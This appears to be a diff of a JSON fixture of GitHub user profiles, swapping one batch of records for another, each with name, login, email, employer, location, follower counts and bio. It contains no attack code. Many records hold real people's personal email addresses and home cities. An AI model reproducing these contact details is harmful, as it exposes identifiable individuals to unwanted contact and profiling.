"public_repositories_count": 40, - "created_at": "2015-03-04T13:21:40Z", - "updated_at": "2024-05-17T19:16:33Z", - "node_id": "MDQ6VXNlcjExMzE0MTQ1", - "bio": "Cloud Artisan at AWS", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-05-04T12:53:47Z", + "updated_at": "2024-08-28T04:57:35Z", + "node_id": "MDQ6VXNlcjEyMjM0NDE0", + "bio": "I'm a developer working on IBM's Watson Studio notebooks and runtimes.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1236, + "pk": 6506, "fields": { - "nest_created_at": "2024-09-11T23:09:54.939Z", - "nest_updated_at": "2024-09-18T18:59:04.874Z", - "name": "Jan Kowalleck", - "login": "jkowalleck", - "email": "jan.kowalleck@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/2765863?v=4", - "company": "volunteer @OWASP @CycloneDX", - "location": "Nuremberg, Germany", + "nest_created_at": "2024-09-22T07:45:46.222Z", + "nest_updated_at": "2024-09-22T18:48:18.816Z", + "name": "Emily Schultz", + "login": "emilyschultz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3474233?v=4", + "company": "Thorn @wearethorn", + "location": "NYC", "collaborators_count": 0, - "following_count": 24, - "followers_count": 36, - "public_gists_count": 2, - "public_repositories_count": 28, - "created_at": "2012-11-10T12:32:28Z", - "updated_at": "2024-09-18T14:32:01Z", - "node_id": "MDQ6VXNlcjI3NjU4NjM=", - "bio": "Software Engineer & Architect · OSS Author & Maintainer · @OWASP @CycloneDX Project Co-Lead", - "is_hireable": true, + "following_count": 3, + "followers_count": 21, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-02-04T18:24:38Z", + "updated_at": "2024-09-12T17:01:11Z", + "node_id": "MDQ6VXNlcjM0NzQyMzM=", + "bio": "VP of Engineering @ Thorn; formerly @newscred & Columbia University", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1237, + "pk": 6507, "fields": { - "nest_created_at": "2024-09-11T23:09:57.007Z", - "nest_updated_at": "2024-09-11T23:09:57.007Z", - "name": "P Christopher Bowers", - "login": "pcbowers", + "nest_created_at": "2024-09-22T07:45:46.533Z", + "nest_updated_at": "2024-09-22T18:48:19.138Z", + "name": "", + "login": "emnetag", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41601975?v=4", - "company": "Liberty University", - "location": "Lynchburg, VA", + "avatar_url": "https://avatars.githubusercontent.com/u/7269445?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 5, "public_gists_count": 2, - "public_repositories_count": 34, - "created_at": "2018-07-24T02:01:20Z", - "updated_at": "2024-01-31T02:45:50Z", - "node_id": "MDQ6VXNlcjQxNjAxOTc1", - "bio": "A systems admin by day and a web developer by any-free-time-I-get", + "public_repositories_count": 70, + "created_at": "2014-04-12T02:59:04Z", + "updated_at": "2022-07-10T07:09:03Z", + "node_id": "MDQ6VXNlcjcyNjk0NDU=", + "bio": "", "is_hireable": false, - "twitter_username": "cferbowers" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1238, + "pk": 6508, "fields": { - "nest_created_at": "2024-09-11T23:10:04.123Z", - "nest_updated_at": "2024-09-11T23:10:04.123Z", - "name": "Tim Messing", - "login": "timmyteo", + "nest_created_at": "2024-09-22T07:45:47.194Z", + "nest_updated_at": "2024-09-22T18:48:19.804Z", + "name": "Manuel Zabelt", + "login": "TTMaZa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/141575989?v=4", - "company": "", - "location": "Denver, CO", + "avatar_url": "https://avatars.githubusercontent.com/u/43759631?v=4", + "company": "TraceTronic GmbH (@tracetronic)", + "location": "Dresden", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, + "following_count": 6, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2023-08-06T16:42:49Z", - "updated_at": "2024-08-14T22:05:32Z", - "node_id": "U_kgDOCHBHNQ", + "public_repositories_count": 13, + "created_at": "2018-10-01T17:50:25Z", + "updated_at": "2024-09-21T11:48:03Z", + "node_id": "MDQ6VXNlcjQzNzU5NjMx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391203,24 +648627,24 @@ }, { "model": "github.user", - "pk": 1239, + "pk": 6509, "fields": { - "nest_created_at": "2024-09-11T23:10:17.656Z", - "nest_updated_at": "2024-09-11T23:10:24.584Z", - "name": "", - "login": "arkajnag23", + "nest_created_at": "2024-09-22T07:45:47.500Z", + "nest_updated_at": "2024-09-22T18:48:20.136Z", + "name": "Marcel Sander", + "login": "msander", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/176372362?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/368751?v=4", "company": "", - "location": "", + "location": "Germany, Paderborn", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-07-23T07:16:07Z", - "updated_at": "2024-08-05T09:25:21Z", - "node_id": "U_kgDOCoM6ig", + "public_repositories_count": 55, + "created_at": "2010-08-18T17:57:17Z", + "updated_at": "2024-08-17T05:50:22Z", + "node_id": "MDQ6VXNlcjM2ODc1MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391228,99 +648652,99 @@ }, { "model": "github.user", - "pk": 1240, + "pk": 6510, "fields": { - "nest_created_at": "2024-09-11T23:10:26.397Z", - "nest_updated_at": "2024-09-11T23:10:26.397Z", - "name": "John-David Dalton", - "login": "jdalton", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4303?v=4", + "nest_created_at": "2024-09-22T07:45:48.116Z", + "nest_updated_at": "2024-09-22T19:41:34.878Z", + "name": "Theodor van Nahl", + "login": "tvannahl", + "email": "t@vannahl.it", + "avatar_url": "https://avatars.githubusercontent.com/u/662132?v=4", "company": "", - "location": "", + "location": "Berlin", "collaborators_count": 0, - "following_count": 22, - "followers_count": 5392, + "following_count": 2, + "followers_count": 2, "public_gists_count": 2, - "public_repositories_count": 14, - "created_at": "2008-04-02T18:54:07Z", - "updated_at": "2024-09-03T21:41:28Z", - "node_id": "MDQ6VXNlcjQzMDM=", - "bio": "JavaScript tinkerer • Lodash creator • Bun engineer • TC39 delegate • Ex (Salesforce, Node core • Electron outreach WG • MS WebPlat+Chakra PM)", + "public_repositories_count": 6, + "created_at": "2011-03-10T14:51:11Z", + "updated_at": "2024-07-25T18:14:38Z", + "node_id": "MDQ6VXNlcjY2MjEzMg==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1241, + "pk": 6511, "fields": { - "nest_created_at": "2024-09-11T23:10:36.056Z", - "nest_updated_at": "2024-09-18T18:55:48.826Z", - "name": "Michael Dong", - "login": "MCDong", - "email": "michaeldong1@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1039335?v=4", - "company": "", - "location": "Austin.tx", + "nest_created_at": "2024-09-22T07:45:48.754Z", + "nest_updated_at": "2024-09-22T18:48:21.387Z", + "name": "Wouter Wijsman", + "login": "sharkwouter", + "email": "wwijsman@live.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/5042659?v=4", + "company": "gridscale", + "location": "Cologne, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 7, - "public_repositories_count": 20, - "created_at": "2011-09-09T18:25:47Z", - "updated_at": "2024-09-10T20:43:35Z", - "node_id": "MDQ6VXNlcjEwMzkzMzU=", - "bio": "", + "following_count": 120, + "followers_count": 90, + "public_gists_count": 2, + "public_repositories_count": 117, + "created_at": "2013-07-18T21:35:11Z", + "updated_at": "2024-09-07T22:00:13Z", + "node_id": "MDQ6VXNlcjUwNDI2NTk=", + "bio": "Hi! I'm a software developer who sometimes works on open source software for fun in his free time", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1242, + "pk": 6512, "fields": { - "nest_created_at": "2024-09-11T23:15:43.488Z", - "nest_updated_at": "2024-09-12T01:42:46.684Z", - "name": "Lorenz Lo Sauer", - "login": "lsauer", + "nest_created_at": "2024-09-22T07:45:49.062Z", + "nest_updated_at": "2024-09-22T18:48:21.696Z", + "name": "", + "login": "akshadpai", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/996117?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/70975196?v=4", "company": "", - "location": "Europe", + "location": "", "collaborators_count": 0, - "following_count": 43, - "followers_count": 25, - "public_gists_count": 125, - "public_repositories_count": 38, - "created_at": "2011-08-22T11:36:39Z", - "updated_at": "2024-07-14T17:20:27Z", - "node_id": "MDQ6VXNlcjk5NjExNw==", - "bio": "CTO eurosoft.uk\r\nA passion to design & architect solutions. Enthusiast of \"difficult\". Part of the Global Top 5% of Web & Desktop development. May I assist you?", - "is_hireable": true, - "twitter_username": "sauerlo" + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-09-08T18:46:40Z", + "updated_at": "2024-07-17T14:57:49Z", + "node_id": "MDQ6VXNlcjcwOTc1MTk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1243, + "pk": 6513, "fields": { - "nest_created_at": "2024-09-11T23:15:45.145Z", - "nest_updated_at": "2024-09-18T18:56:01.914Z", - "name": "", - "login": "Mtothexmax", + "nest_created_at": "2024-09-22T07:45:49.369Z", + "nest_updated_at": "2024-09-22T18:48:22.004Z", + "name": "Thomas Beutlich", + "login": "thbeu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129895845?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/115483027?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 10, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2023-04-04T18:59:56Z", - "updated_at": "2024-09-11T21:47:00Z", - "node_id": "U_kgDOB74NpQ", + "public_repositories_count": 20, + "created_at": "2022-10-10T14:39:21Z", + "updated_at": "2024-07-15T07:48:49Z", + "node_id": "U_kgDOBuIhkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391328,149 +648752,174 @@ }, { "model": "github.user", - "pk": 1244, + "pk": 6514, "fields": { - "nest_created_at": "2024-09-11T23:15:53.545Z", - "nest_updated_at": "2024-09-12T01:25:00.778Z", - "name": "Ravi Soni", - "login": "rvsoni", - "email": "rv.soni@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4734787?v=4", - "company": "", + "nest_created_at": "2024-09-22T07:45:56.403Z", + "nest_updated_at": "2024-09-22T18:48:29.204Z", + "name": "Anton Grübel", + "login": "gruebel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33207684?v=4", + "company": "@baz-scm", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 3, + "following_count": 2, + "followers_count": 48, "public_gists_count": 0, - "public_repositories_count": 58, - "created_at": "2013-06-19T04:14:48Z", - "updated_at": "2024-07-27T04:17:46Z", - "node_id": "MDQ6VXNlcjQ3MzQ3ODc=", - "bio": "AWS Certified Solutions Architect with 15+ years of experience in design, maintenance, and migration of Java, JavaEE, Spring boot app development", - "is_hireable": true, + "public_repositories_count": 54, + "created_at": "2017-10-29T23:20:36Z", + "updated_at": "2024-08-07T12:23:39Z", + "node_id": "MDQ6VXNlcjMzMjA3Njg0", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1245, + "pk": 6515, "fields": { - "nest_created_at": "2024-09-11T23:15:55.221Z", - "nest_updated_at": "2024-09-11T23:15:55.222Z", - "name": "Omachonu Ogali", - "login": "oogali", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/232224?v=4", - "company": "Ordinary Stack", - "location": "Princeton, NJ", + "nest_created_at": "2024-09-22T07:45:57.680Z", + "nest_updated_at": "2024-09-22T18:48:30.476Z", + "name": "Adam Johnson", + "login": "adamchainz", + "email": "me@adamj.eu", + "avatar_url": "https://avatars.githubusercontent.com/u/857609?v=4", + "company": "@django, @djangolondon", + "location": "London / Lisbon", + "collaborators_count": 0, + "following_count": 159, + "followers_count": 3664, + "public_gists_count": 28, + "public_repositories_count": 1300, + "created_at": "2011-06-17T23:53:10Z", + "updated_at": "2024-06-08T16:49:35Z", + "node_id": "MDQ6VXNlcjg1NzYwOQ==", + "bio": "🦄 @django technical board member \r\n🇬🇧 @djangolondon co-organizer \r\n✍ AWS/Django/Python Author and Consultant", + "is_hireable": false, + "twitter_username": "adamchainz" + } +}, +{ + "model": "github.user", + "pk": 6516, + "fields": { + "nest_created_at": "2024-09-22T07:45:58.313Z", + "nest_updated_at": "2024-09-22T18:48:31.092Z", + "name": "Christoph Reiter", + "login": "lazka", + "email": "reiter.christoph@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/991986?v=4", + "company": "", + "location": "Graz", "collaborators_count": 0, - "following_count": 202, - "followers_count": 71, - "public_gists_count": 137, - "public_repositories_count": 61, - "created_at": "2010-03-28T21:42:47Z", - "updated_at": "2024-08-20T11:20:18Z", - "node_id": "MDQ6VXNlcjIzMjIyNA==", - "bio": "Always interested in technical problems that capture my attention. \r\n\r\nGo, Python, networking, and infrastructure automation.", + "following_count": 38, + "followers_count": 290, + "public_gists_count": 4, + "public_repositories_count": 164, + "created_at": "2011-08-19T22:23:56Z", + "updated_at": "2024-07-01T05:30:00Z", + "node_id": "MDQ6VXNlcjk5MTk4Ng==", + "bio": "ᅟ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1246, + "pk": 6517, "fields": { - "nest_created_at": "2024-09-11T23:15:56.071Z", - "nest_updated_at": "2024-09-18T18:56:05.998Z", - "name": "", - "login": "JoelJuaristi", + "nest_created_at": "2024-09-22T07:45:58.622Z", + "nest_updated_at": "2024-09-22T18:48:31.453Z", + "name": "Claudia Pellegrino", + "login": "claui", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60225391?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1239874?v=4", + "company": "@dbsystel", + "location": "Darmstadt, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-01-23T14:29:45Z", - "updated_at": "2024-06-23T09:02:44Z", - "node_id": "MDQ6VXNlcjYwMjI1Mzkx", - "bio": "", + "following_count": 82, + "followers_count": 488, + "public_gists_count": 18, + "public_repositories_count": 148, + "created_at": "2011-12-04T15:34:37Z", + "updated_at": "2024-09-20T11:57:55Z", + "node_id": "MDQ6VXNlcjEyMzk4NzQ=", + "bio": "Command line and package management enthusiast. Linux daily driver, AUR package contributor. Getting into Debian packaging. Former @Homebrew maintainer.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1247, + "pk": 6518, "fields": { - "nest_created_at": "2024-09-11T23:16:11.080Z", - "nest_updated_at": "2024-09-13T05:16:48.514Z", - "name": "Robert Smigielski", - "login": "ptdropper", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7337269?v=4", - "company": "ptdropper at gmail dot com", - "location": "Allentown Pennsylvania", + "nest_created_at": "2024-09-22T07:45:58.929Z", + "nest_updated_at": "2024-09-22T18:48:31.773Z", + "name": "Louis Maillard", + "login": "loulou123546", + "email": "louis.maillard@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20153343?v=4", + "company": "Savoir-Faire Linux", + "location": "Canada, Québec", "collaborators_count": 0, - "following_count": 6, + "following_count": 14, "followers_count": 9, - "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2014-04-18T13:16:44Z", - "updated_at": "2024-09-04T14:22:42Z", - "node_id": "MDQ6VXNlcjczMzcyNjk=", - "bio": "Embedded software developer in the areas of medical devices, embedded telecommunication processors, writing software in C and many other languages", - "is_hireable": false, + "public_gists_count": 7, + "public_repositories_count": 28, + "created_at": "2016-06-26T15:06:28Z", + "updated_at": "2024-09-18T11:34:44Z", + "node_id": "MDQ6VXNlcjIwMTUzMzQz", + "bio": "I speak : FR and EN. I code on : HTML/CSS/JS, Node.js, Python, Rust, MySQL, LUA, C, C#, Arduino, ... You can contact me on discord : @loulou123546 and by mail", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1248, + "pk": 6519, "fields": { - "nest_created_at": "2024-09-11T23:16:20.990Z", - "nest_updated_at": "2024-09-18T19:07:39.649Z", - "name": "Niklas", - "login": "nscuro", - "email": "nscuro@protonmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5693141?v=4", - "company": "", - "location": "Kiel, Germany", + "nest_created_at": "2024-09-22T07:45:59.545Z", + "nest_updated_at": "2024-09-22T18:48:32.453Z", + "name": "William Woodruff", + "login": "woodruffw", + "email": "william@yossarian.net", + "avatar_url": "https://avatars.githubusercontent.com/u/3059210?v=4", + "company": "@trailofbits ", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 8, - "followers_count": 58, - "public_gists_count": 4, - "public_repositories_count": 48, - "created_at": "2013-10-15T16:45:22Z", - "updated_at": "2024-09-17T18:01:34Z", - "node_id": "MDQ6VXNlcjU2OTMxNDE=", - "bio": "\"I have no idea why this works. You better don't touch it.\"", + "following_count": 28, + "followers_count": 729, + "public_gists_count": 20, + "public_repositories_count": 91, + "created_at": "2012-12-17T01:59:44Z", + "updated_at": "2024-09-21T18:31:46Z", + "node_id": "MDQ6VXNlcjMwNTkyMTA=", + "bio": "eng. dir. @trailofbits, member @Homebrew, interloper\r\n\r\n", "is_hireable": false, - "twitter_username": "nscur0" + "twitter_username": "8x5clPW2" } }, { "model": "github.user", - "pk": 1249, + "pk": 6520, "fields": { - "nest_created_at": "2024-09-11T23:16:41.425Z", - "nest_updated_at": "2024-09-11T23:16:41.425Z", + "nest_created_at": "2024-09-22T07:45:59.864Z", + "nest_updated_at": "2024-09-22T18:48:32.809Z", "name": "", - "login": "meto1111", + "login": "jblu42", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3693036?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/82205623?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-02-25T11:12:43Z", - "updated_at": "2022-11-02T11:54:21Z", - "node_id": "MDQ6VXNlcjM2OTMwMzY=", + "public_repositories_count": 3, + "created_at": "2021-04-09T07:57:50Z", + "updated_at": "2024-06-17T07:33:50Z", + "node_id": "MDQ6VXNlcjgyMjA1NjIz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391478,49 +648927,49 @@ }, { "model": "github.user", - "pk": 1250, + "pk": 6521, "fields": { - "nest_created_at": "2024-09-11T23:16:42.215Z", - "nest_updated_at": "2024-09-12T01:31:18.877Z", + "nest_created_at": "2024-09-22T07:46:00.177Z", + "nest_updated_at": "2024-09-22T18:48:33.122Z", "name": "", - "login": "nil4", + "login": "rcross-lc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/139133?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/151086351?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 13, - "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2009-10-13T10:44:53Z", - "updated_at": "2024-09-03T19:10:13Z", - "node_id": "MDQ6VXNlcjEzOTEzMw==", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2023-11-16T20:54:16Z", + "updated_at": "2024-06-24T14:23:06Z", + "node_id": "U_kgDOCQFlDw", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1251, + "pk": 6522, "fields": { - "nest_created_at": "2024-09-11T23:16:43.847Z", - "nest_updated_at": "2024-09-12T00:08:00.539Z", - "name": "Daniel Nebenzahl", - "login": "dn-scribe", - "email": "dn@scribesecurity.com", - "avatar_url": "https://avatars.githubusercontent.com/u/85332941?v=4", - "company": "Scribe Security", - "location": "Israel", + "nest_created_at": "2024-09-22T07:46:05.552Z", + "nest_updated_at": "2024-09-22T18:48:38.353Z", + "name": "Joseph Kobti", + "login": "jkobti", + "email": "josephkobti@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5858677?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 2, "public_gists_count": 0, "public_repositories_count": 8, - "created_at": "2021-06-04T06:01:59Z", - "updated_at": "2024-08-10T18:28:04Z", - "node_id": "MDQ6VXNlcjg1MzMyOTQx", + "created_at": "2013-11-05T09:25:35Z", + "updated_at": "2024-08-28T19:18:58Z", + "node_id": "MDQ6VXNlcjU4NTg2Nzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391528,49 +648977,49 @@ }, { "model": "github.user", - "pk": 1252, + "pk": 6523, "fields": { - "nest_created_at": "2024-09-11T23:16:45.951Z", - "nest_updated_at": "2024-09-11T23:16:45.951Z", - "name": "", - "login": "tidepodz", + "nest_created_at": "2024-09-22T07:46:05.884Z", + "nest_updated_at": "2024-09-22T19:42:05.233Z", + "name": "Sören Sprößig", + "login": "ssproessig", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55209256?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1576323?v=4", "company": "", - "location": "", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2019-09-11T19:04:28Z", - "updated_at": "2024-02-01T20:17:52Z", - "node_id": "MDQ6VXNlcjU1MjA5MjU2", - "bio": "Researcher at INL", + "following_count": 2, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 32, + "created_at": "2012-03-26T13:51:51Z", + "updated_at": "2024-04-18T09:49:07Z", + "node_id": "MDQ6VXNlcjE1NzYzMjM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1253, + "pk": 6524, "fields": { - "nest_created_at": "2024-09-11T23:16:46.780Z", - "nest_updated_at": "2024-09-11T23:19:01.824Z", + "nest_created_at": "2024-09-22T07:46:06.194Z", + "nest_updated_at": "2024-09-22T18:48:38.973Z", "name": "", - "login": "lweitzel01", + "login": "josephkobti", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87398514?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/54405348?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-07-13T23:15:08Z", - "updated_at": "2023-03-09T20:09:32Z", - "node_id": "MDQ6VXNlcjg3Mzk4NTE0", + "public_repositories_count": 8, + "created_at": "2019-08-22T13:26:44Z", + "updated_at": "2021-04-06T09:03:32Z", + "node_id": "MDQ6VXNlcjU0NDA1MzQ4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391578,49 +649027,49 @@ }, { "model": "github.user", - "pk": 1254, + "pk": 6525, "fields": { - "nest_created_at": "2024-09-11T23:16:47.600Z", - "nest_updated_at": "2024-09-11T23:16:47.600Z", - "name": "Jaykumar", - "login": "PentestInd", + "nest_created_at": "2024-09-22T07:46:06.506Z", + "nest_updated_at": "2024-09-22T18:48:39.304Z", + "name": "Jeffrey Zhang ", + "login": "jeffreysfllo24", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/91212533?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/31040159?v=4", "company": "", - "location": "", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 7, - "followers_count": 0, + "following_count": 0, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2021-09-22T16:26:01Z", - "updated_at": "2024-08-01T14:21:11Z", - "node_id": "MDQ6VXNlcjkxMjEyNTMz", - "bio": "Pentester", + "public_repositories_count": 11, + "created_at": "2017-08-15T14:23:23Z", + "updated_at": "2024-03-31T18:41:02Z", + "node_id": "MDQ6VXNlcjMxMDQwMTU5", + "bio": "University of Waterloo CS 2022", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1255, + "pk": 6526, "fields": { - "nest_created_at": "2024-09-11T23:16:48.448Z", - "nest_updated_at": "2024-09-12T01:42:51.786Z", + "nest_created_at": "2024-09-22T07:46:07.146Z", + "nest_updated_at": "2024-09-22T18:48:39.955Z", "name": "", - "login": "flemminglau", + "login": "jkbuster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25148089?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1432093?v=4", "company": "", - "location": "", + "location": "Wherever, Earth", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-01-16T09:15:23Z", - "updated_at": "2024-09-03T10:57:43Z", - "node_id": "MDQ6VXNlcjI1MTQ4MDg5", + "following_count": 2, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2012-02-13T02:18:16Z", + "updated_at": "2024-08-20T16:55:45Z", + "node_id": "MDQ6VXNlcjE0MzIwOTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391628,24 +649077,24 @@ }, { "model": "github.user", - "pk": 1256, + "pk": 6527, "fields": { - "nest_created_at": "2024-09-11T23:16:49.250Z", - "nest_updated_at": "2024-09-11T23:16:54.186Z", - "name": "Kostiantyn", - "login": "kkovaletp", + "nest_created_at": "2024-09-22T07:46:14.665Z", + "nest_updated_at": "2024-09-22T18:48:47.581Z", + "name": "Allie Sierra", + "login": "allisonsierra", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32730812?v=4", - "company": "Infinidat", + "avatar_url": "https://avatars.githubusercontent.com/u/85902135?v=4", + "company": "@sonatype ", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 5, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-10-12T07:34:23Z", - "updated_at": "2024-05-14T08:47:48Z", - "node_id": "MDQ6VXNlcjMyNzMwODEy", + "public_repositories_count": 5, + "created_at": "2021-06-14T19:13:18Z", + "updated_at": "2023-08-11T15:48:55Z", + "node_id": "MDQ6VXNlcjg1OTAyMTM1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391653,74 +649102,74 @@ }, { "model": "github.user", - "pk": 1257, + "pk": 6528, "fields": { - "nest_created_at": "2024-09-11T23:16:50.905Z", - "nest_updated_at": "2024-09-11T23:16:50.905Z", - "name": "", - "login": "Adrian-Sevan", + "nest_created_at": "2024-09-22T07:46:15.607Z", + "nest_updated_at": "2024-09-22T18:48:48.532Z", + "name": "Ted Driggs", + "login": "TedDriggs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9453531?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4805575?v=4", + "company": "@crowdstrike", + "location": "Seattle", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-10-29T21:42:42Z", - "updated_at": "2023-09-16T08:04:51Z", - "node_id": "MDQ6VXNlcjk0NTM1MzE=", - "bio": "", + "following_count": 8, + "followers_count": 56, + "public_gists_count": 4, + "public_repositories_count": 67, + "created_at": "2013-06-24T18:21:42Z", + "updated_at": "2024-09-12T02:29:14Z", + "node_id": "MDQ6VXNlcjQ4MDU1NzU=", + "bio": "CrowdStrike Product Manager, ExtraHop and Microsoft alum, Rust dev, skier, horseback rider, and stand-up paddleboarder", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1258, + "pk": 6529, "fields": { - "nest_created_at": "2024-09-11T23:16:51.704Z", - "nest_updated_at": "2024-09-11T23:16:51.704Z", - "name": "Chris Clarkson", - "login": "ClarksonCJ", + "nest_created_at": "2024-09-22T07:46:15.962Z", + "nest_updated_at": "2024-09-22T18:48:48.844Z", + "name": "Markus Theil", + "login": "thillux", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3652990?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2171995?v=4", "company": "", - "location": "Leeds, UK", + "location": "", "collaborators_count": 0, - "following_count": 342, - "followers_count": 41, - "public_gists_count": 3, - "public_repositories_count": 40, - "created_at": "2013-02-20T21:35:38Z", - "updated_at": "2024-07-31T09:44:54Z", - "node_id": "MDQ6VXNlcjM2NTI5OTA=", + "following_count": 23, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 56, + "created_at": "2012-08-17T21:37:13Z", + "updated_at": "2024-09-13T11:36:48Z", + "node_id": "MDQ6VXNlcjIxNzE5OTU=", "bio": "", "is_hireable": false, - "twitter_username": "ClarksonCJ" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1259, + "pk": 6530, "fields": { - "nest_created_at": "2024-09-11T23:16:52.534Z", - "nest_updated_at": "2024-09-11T23:16:52.534Z", - "name": "Alexander Mitte", - "login": "almitte", + "nest_created_at": "2024-09-22T07:46:16.271Z", + "nest_updated_at": "2024-09-22T18:48:49.173Z", + "name": "Andreas König", + "login": "koa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101641863?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/548972?v=4", + "company": "Panter AG", + "location": "Zürich", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-03-15T12:07:01Z", - "updated_at": "2024-09-11T04:35:43Z", - "node_id": "U_kgDOBg7uhw", + "public_repositories_count": 69, + "created_at": "2011-01-05T17:37:51Z", 